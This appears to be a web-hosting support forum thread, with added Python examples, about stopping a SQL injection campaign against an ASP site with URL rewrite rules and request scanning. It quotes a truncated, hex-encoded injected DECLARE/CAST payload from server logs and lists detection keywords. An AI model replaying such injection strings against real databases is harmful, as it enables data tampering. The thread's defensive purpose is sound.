Helicon Tech : ISAPI_Rewrite 2.x support forum
Subject Topic: prevent SQL Injection hacks
maven2707
Newbie
Joined: 20 May 2007
Location: United Kingdom
Posts: 6
Posted: 18 April 2008 at 12:21am

Hello

Recently, my site has been suffering from SQL Injection from hackers.

The hack is very clever and cloaked so it is difficult to find in the IIS logs.  I have now found a pattern and want to find a way to identify this using ISAPI Rewrite so I can redirect the URL before any damage is done.

During a POST the following is added

POST /somepage.asp ID=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0

How can I check for the DECLARE keyword in the URL string using ISAPI Rewrite?

thanks

 

Matthew

 


Yaroslav
Moderator Group
Joined: 15 August 2002
Posts: 6451
Posted: 21 April 2008 at 4:11am

Rewriterule .*DECLARE\s.* http\://www.mysite.com/block.asp [I,R]

This will only work if the keyword is present in the query string or URL part; it will not work if parameters are passed as POST data in the request body.

__________________
Yaroslav Govorunov,
Helicon Tech

maven2707
Newbie
Joined: 20 May 2007
Location: United Kingdom
Posts: 6
Posted: 21 April 2008 at 10:52am

Thanks for this. Unfortunately this won't work as you suggested, as the parameters are passed as POST.

Below is how the attack appears in the IIS logs in case you have any further ideas. Obviously I need to update my site with better validation, but this is a lot of work and I was hoping ISAPIWRITE could have a fix-for-all solution.

POST /somefile.asp ID=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST([...]


Yaroslav
Moderator Group
Joined: 15 August 2002
Posts: 6451
Posted: 23 April 2008 at 4:51am

Since the parameters appear in the IIS log, they are passed as a query string and can be matched by ISAPI_Rewrite. I made a typo in the previous rule:

RewriteRule .*DECLARE.* http\://www.mysite.com/block.asp [I,R]

__________________
Yaroslav Govorunov,
Helicon Tech

Anson
Newbie
Joined: 30 April 2008
Posts: 1
Posted: 30 April 2008 at 3:59pm

The following worked for me.

RewriteCond %{query_string} declare%20
RewriteRule !403\.html$ - [F]

I think I'm going to redirect for "sp_password" also.

The next step will be to create a page that sends / logs an alert and bans the IP for a few hours.

jhoskins
Newbie
Joined: 14 May 2008
Location: United States
Posts: 1
Posted: 14 May 2008 at 9:03am

So will the solutions above or the product itself have the ability to combat POST Requests?

Yaroslav?

Yaroslav
Moderator Group
Joined: 15 August 2002
Posts: 6451
Posted: 15 May 2008 at 4:45am

No, ISAPI_Rewrite cannot analyze the request body. At the stage when the body is downloaded from the client, it is too late to alter the URL and change the request handler on the server.

__________________
Yaroslav Govorunov,
Helicon Tech

rcoopman
Newbie
Joined: 28 May 2008
Posts: 2
Posted: 28 May 2008 at 12:23pm

Convert the hex to text using this tool: http://www.string-functions.com/hex-string.aspx and you will notice that they are using the sysobjects / syscolumns to do massive damage to multiple tables. Try disabling permissions to these tables...
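
The hex-to-text step from the post above can be done offline during log triage. This is an added example, not part of the original post; the function names are hypothetical, and the UTF-16LE decoding is an assumption based on the NVARCHAR(4000) declaration visible in the logged entry.

```python
import re
from urllib.parse import unquote

# The log entry quoted in the first post; its hex literal is cut off mid-character.
LOG_LINE = (
    "POST /somepage.asp ID=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "4400450043004C004100520045002000400054002000"
    "7600610072006300680061007200280032003500350029002C00"
    "4000430020007600610072006300680061007200280032003500350029002000"
    "4400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0"
)

HEX_LITERAL = re.compile(r"CAST\(\s*0x([0-9A-F]+)", re.IGNORECASE)


def decode_cast_payloads(log_line):
    """Return the readable text of every CAST(0x...) literal in one log line."""
    decoded = []
    for match in HEX_LITERAL.finditer(unquote(log_line)):
        digits = match.group(1)
        # Assumption: the literal is NVARCHAR data (UTF-16LE, 4 hex digits per
        # character), as the NVARCHAR(4000) declaration in the entry suggests.
        # A truncated log field can end mid-character, so drop the remainder.
        digits = digits[: len(digits) - len(digits) % 4]
        decoded.append(bytes.fromhex(digits).decode("utf-16-le", errors="replace"))
    return decoded


def triage(log_lines):
    """Return (line number, decoded text) for each entry carrying a hex payload."""
    return [
        (number, text)
        for number, line in enumerate(log_lines, start=1)
        for text in decode_cast_payloads(line)
    ]


if __name__ == "__main__":
    # The second line is a constructed benign request for contrast.
    for number, text in triage([LOG_LINE, "GET /somepage.asp ID=1"]):
        print(number, text)
```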

rcoopman
Newbie
Joined: 28 May 2008
Posts: 2
Posted: 28 May 2008 at 12:46pm

Another approach that can be useful as a catch all sql shield is to create an include file with a function to iterate the request.form and request.querystring collections and scan for any potential attacks. Then you can just place the include at the top of the page and have it scan each time a page is loaded. This can also be used for scanning the cookies, sessions and so forth.

As far as using isapi rewrite, you could potentially have every request to your site first go to a page with a sql shield script like I just described, and if it passes the script then you could server.transfer to the originally requested page with all the qs/form stuff intact. If it doesn't pass the sql shield, no soup for you.
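
A sketch of the scan described in the post above, covering both the query string and the POST body that ISAPI_Rewrite cannot see. This is an added example, not the poster's code, and it is written in Python rather than classic ASP so it runs stand-alone; `scan_request`, `MARKERS` and the sample requests are hypothetical and constructed.

```python
import re
from urllib.parse import unquote_plus

# Markers mentioned in this thread; names and patterns are this example's own.
MARKERS = {
    "declare": re.compile(r"\bdeclare\s+@", re.IGNORECASE),
    "cast-hex": re.compile(r"\bcast\s*\(\s*0x", re.IGNORECASE),
    "sp_password": re.compile(r"\bsp_password\b", re.IGNORECASE),
    "system-table": re.compile(r"\bsys(?:objects|columns)\b", re.IGNORECASE),
}


def scan_request(query_string, form_body):
    """Return (collection, field, marker) for each marker found in a value."""
    hits = []
    for collection, raw in (("querystring", query_string), ("form", form_body)):
        for pair in raw.split("&"):
            field, _, value = pair.partition("=")
            # Decode before matching so %20, + and mixed case all compare alike.
            value = unquote_plus(value)
            for marker, pattern in MARKERS.items():
                if pattern.search(value):
                    hits.append((collection, unquote_plus(field), marker))
    return hits


# Constructed requests: the query string follows the log entry quoted earlier
# in the thread (hex shortened); the form body puts the same shape in a POST body.
SAMPLE_QUERY = "ID=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400"
SAMPLE_FORM = "comment=hello+world&ID=123;declare%20@s%20nvarchar(4000)"

if __name__ == "__main__":
    print(scan_request(SAMPLE_QUERY, ""))
    print(scan_request("page=2", SAMPLE_FORM))
```

Keyword matching of this kind is a stopgap that will also flag legitimate text containing these words; it does not replace the better validation the first poster mentions or the permission changes suggested earlier in the thread.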
